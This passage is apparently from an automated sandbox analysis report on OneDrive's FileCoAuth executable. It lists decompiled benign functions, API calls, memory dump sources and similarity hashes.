    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: AddressProc
    • String ID: CalculatePopupWindowPosition$User32.dll
    • API String ID: 190572456-1235422894
    • Opcode ID: 1f0a8c0dce299313428f3242ccc9fd73c0213a8de26552b9c00ca4d1086b5ddf
    • Instruction ID: fb39d9b3e64a9636f605a39ae24c8fbd67db9cc8080a41aa976d1879068b80f4
    • Opcode Fuzzy Hash: 1f0a8c0dce299313428f3242ccc9fd73c0213a8de26552b9c00ca4d1086b5ddf
    • Instruction Fuzzy Hash: 28E0123251431AABCF119FE5DC05E9B3F9AAF4975470A8010BE54FA061D731DD60DBA0
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E97559, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23libraryloaderCOMMON
    Download Yara Rule
    C-Code - Quality: 42%
    			E00E97559(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8) {
				struct HINSTANCE__* _t5;
				_Unknown_base(*)()* _t7;
				void* _t10;

				_push(L"Shell32.dll");
				_t5 =  *((intOrPtr*)( *__ecx + 0x48))();
				_t10 = 0x80004005;
				if(_t5 != 0) {
					_t7 = GetProcAddress(_t5, "Shell_NotifyIconGetRect");
					if(_t7 != 0) {
						_t10 =  *_t7(_a4, _a8);
					}
				}
				return _t10;
			}






    0x00e97561
    0x00e97566
    0x00e97569
    0x00e97570
    0x00e97578
    0x00e97580
    0x00e9758a
    0x00e9758a
    0x00e97580
    0x00e97590

    APIs
    • GetProcAddress.KERNEL32(00000000,Shell_NotifyIconGetRect), ref: 00E97578
    Strings
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: AddressProc
    • String ID: Shell32.dll$Shell_NotifyIconGetRect
    • API String ID: 190572456-3914173280
    • Opcode ID: 22573b769a5289e6fcb786e1516614bf92594dff1d3e077f8ec8f15361b9cc0a
    • Instruction ID: 418a9f4f83624a09137e815440bea0d761c2b7b4275018f078c6933aef890220
    • Opcode Fuzzy Hash: 22573b769a5289e6fcb786e1516614bf92594dff1d3e077f8ec8f15361b9cc0a
    • Instruction Fuzzy Hash: 8FE08C323043146BCB50AAA99C08E9A3B99AF4A7A07068060BD58FB120DA31ED00CBA0
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E92DC7, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
    Download Yara Rule
    APIs
    • ?_Syserror_map@std@@YAPBDH@Z.MSVCP120(?), ref: 00E92DD1
    Strings
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: Syserror_map@std@@
    • String ID: @h$xh
    • API String ID: 1066479615-1883358580
    • Opcode ID: 1db1547d8595f1e65fe6b12d13862cd27411b91e45d12fa21aba03689e71529a
    • Instruction ID: 7a41778853bc7970a85b7621761d66b6173a49bd1b0a46f7e7a85f1cedfe59b6
    • Opcode Fuzzy Hash: 1db1547d8595f1e65fe6b12d13862cd27411b91e45d12fa21aba03689e71529a
    • Instruction Fuzzy Hash: C2D01232102114AF4B109F4998089D77FD8EE86765309D045F908AF120C770E9449FD4
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E93DB4, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
    Download Yara Rule
    APIs
    • ?LoggingWriteStructuredEvent@@YGXPBDI0ABU_GUID@@IIIQAUStructuredEventParameter@@@Z.LOGGINGPLATFORM(d:\dbs\sh\odib\0313_155253\cmd\24\client\onedrive\product\filecoauth\filecoauth\syncenginefileinfoprovider.cpp,?,?,00EA7810,00C7B025,00000001,00000000,00000000), ref: 00E93DD2
    • ?LoggingRotateIfNeeded@@YGXXZ.LOGGINGPLATFORM(?,?,00EA7810,00C7B025,00000001,00000000,00000000), ref: 00E93DD8
    Strings
    • d:\dbs\sh\odib\0313_155253\cmd\24\client\onedrive\product\filecoauth\filecoauth\syncenginefileinfoprovider.cpp, xrefs: 00E93DCD
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: LoggingStructured$EventEvent@@Needed@@Parameter@@@RotateWrite
    • String ID: d:\dbs\sh\odib\0313_155253\cmd\24\client\onedrive\product\filecoauth\filecoauth\syncenginefileinfoprovider.cpp
    • API String ID: 2559330748-387945833
    • Opcode ID: 34119663de05aef27d88406779a2477e84351caa8a65feb62a384dea30402be8
    • Instruction ID: 191002afe24c8ab954e1f764e4749dca0dac93f76bf705d91c66e15311d0e803
    • Opcode Fuzzy Hash: 34119663de05aef27d88406779a2477e84351caa8a65feb62a384dea30402be8
    • Instruction Fuzzy Hash: 59D0C9712C43087BE62056529C0EF967E29D79FF11F148421B218380E286E278148658
    Uniqueness

    Uniqueness Score: -1,00%